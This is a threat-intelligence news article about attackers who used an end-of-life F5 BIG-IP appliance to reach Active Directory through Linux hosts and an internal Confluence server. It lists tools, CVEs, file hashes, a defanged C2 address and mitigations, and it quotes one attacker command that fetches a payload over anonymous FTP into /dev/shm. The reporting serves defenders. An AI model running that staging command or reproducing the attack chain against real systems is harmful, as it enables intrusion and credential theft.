Threat actors are actively exploiting end-of-life F5 BIG-IP appliances to gain unauthorized SSH access into enterprise networks, using the compromised devices as launchpads for sophisticated multi-stage intrusion campaigns that ultimately target Active Directory infrastructure.
Microsoft Threat Intelligence disclosed the full attack chain on May 22, 2026, documenting how a single compromised edge appliance cascaded into domain-level compromise spanning Linux hosts, an internal Atlassian Confluence server, and Windows authentication systems.
In the documented incident, investigators traced the threat actor’s initial SSH access to an Azure-hosted F5 BIG-IP Virtual Edition (VE) running version 15.1.201000, a cloud-deployed build commonly provisioned via Azure ARM templates and Terraform modules.
This specific version reached end-of-life (EOL) on December 31, 2024, leaving it unpatched and unsupported at the time of compromise.
F5 BIG-IP to Gain SSH Access
The timing aligns directly with the broader F5 threat landscape. In August 2025, a sophisticated nation-state threat actor breached F5’s internal systems and exfiltrated BIG-IP product source code along with details of undisclosed, unpatched vulnerabilities.

That breach, publicly disclosed by F5 in October 2025, has been linked to the BRICKSTORM malware family, which is associated with campaigns targeting software and cloud vendors to harvest source code and credentials for downstream supply chain exploitation.
Compounding the risk, CVE-2025-53521, a critical flaw in F5 BIG-IP Access Policy Manager (APM), was originally disclosed in October 2025 as a denial-of-service bug, but in March 2026 it was reclassified as a remote code execution (RCE) vulnerability with a CVSS score of 9.8.
CISA added CVE-2025-53521 to its Known Exploited Vulnerabilities (KEV) catalog on March 27, 2026, with Shadowserver Foundation reporting over 17,000 vulnerable IPs worldwide at the time. The Dutch National Cyber Security Center also independently confirmed active abuse of this vulnerability in the wild.
Once SSH access was established via the compromised F5 appliance, the threat actor authenticated using a privileged account with unrestricted sudo rights and maintained hands-on keyboard access throughout the entire intrusion without deploying explicit persistence mechanisms.
The attacker immediately launched aggressive reconnaissance using a layered toolkit:
- Nmap with automated shell scripts for horizontal and vertical network scanning across internal subnets
- GoWitness to screenshot-capture all discovered HTTP/HTTPS services
- testssl to probe SSL/TLS weaknesses and identify potential protocol downgrade paths
- A custom ELF binary detected as HackTool:Linux/MalPack.B, downloaded from 206.189.27[.]39:8888 via wget, to enumerate web application access controls
Attempts to use standard NTLM-based lateral movement tools, including enum4linux, kerbrute, responder, smbclient, and netexec, against the Windows infrastructure were initially unsuccessful.
During reconnaissance, the threat actor identified an internally hosted Atlassian Confluence server carrying unpatched remote code execution vulnerabilities.
Microsoft stated that the server was not internet-facing; it became reachable only after the attacker gained internal network access, a key risk in hybrid and cloud environments where implicit trust boundaries exist between services.
When real-time protection (RTP) on the Confluence host blocked direct payload delivery, the threat actor adapted by standing up a Python FTP server on the initial Linux host to stage and transfer the payload using anonymous FTP:
```bash
curl -o /dev/shm/ag ftp://anonymous:anonymous@[REDACTED_LOCAL_IP]/5
```

After compromising Confluence, the attacker extracted credentials from /opt/atlassian/confluence/conf/server.xml and confluence.cfg.xml and weaponized them for Kerberos relay attacks against the domain infrastructure.
This included exploitation of CVE-2025-33073, a Windows SMB NTLM reflection vulnerability disclosed in June 2025 by researchers at RedTeam Pentesting and Synacktiv.
CVE-2025-33073 removes the prerequisite of admin access to achieve authenticated RCE as SYSTEM on any domain-joined machine without SMB signing enforced, requiring only network access and any valid domain credential.
| Indicator | Type | Description |
|---|---|---|
| 4a927d031919fd6bd88d3c8a917214b54bca00f8ddc80ecfe4d230663dda7465 | SHA-256 File Hash | Custom scanning tool (HackTool:Linux/MalPack.B) |
| b4592cea69699b2c0737d4e19cff7dca17b5baf5a238cd6da950a37e9986f216 | SHA-256 File Hash | Shell script automating Nmap network scanning |
| 710a9d2653c8bd3689e451778dab9daec0de4c4c75f900788ccf23ef254b122a | SHA-256 File Hash | Kerbrute tool (HackTool:Linux/Kerbrute!rfn) |
| 57b3188e24782c27fdf72493ce599537efd3187d03b80f8afe733c72d68c5517 | SHA-256 File Hash | gowitness HTTP/HTTPS screenshot scanner |
| bdd5da81ac34d9faa2a5118d4ed8f492239734be02146cd24a0e34270a48a455 | SHA-256 File Hash | NTLM relay Python script (CVE-2025-33073 exploit) |
| 206.189.27[.]39 | IPv4 Address (Defanged) | C2 server used for payload delivery on port 8888 |
Note: IP addresses and domains are intentionally defanged (e.g., [.]) to prevent accidental resolution or hyperlinking. Re-fang only within controlled threat intelligence platforms such as MISP, VirusTotal, or your SIEM.
Mitigation
- Retire EOL appliances immediately, and treat internet-facing edge devices as Tier-0 assets with strict lifecycle governance.
- Patch internal applications like Confluence with the same urgency as internet-exposed services.
- Disable or minimize NTLM, enforce SMB signing, and enable LDAP signing and channel binding to block relay attacks.
- Enable Microsoft Defender for Endpoint in block mode consistently across all Linux servers.
- Implement a tiered administration model so that credentials stolen from a single application cannot be used to reach domain controllers.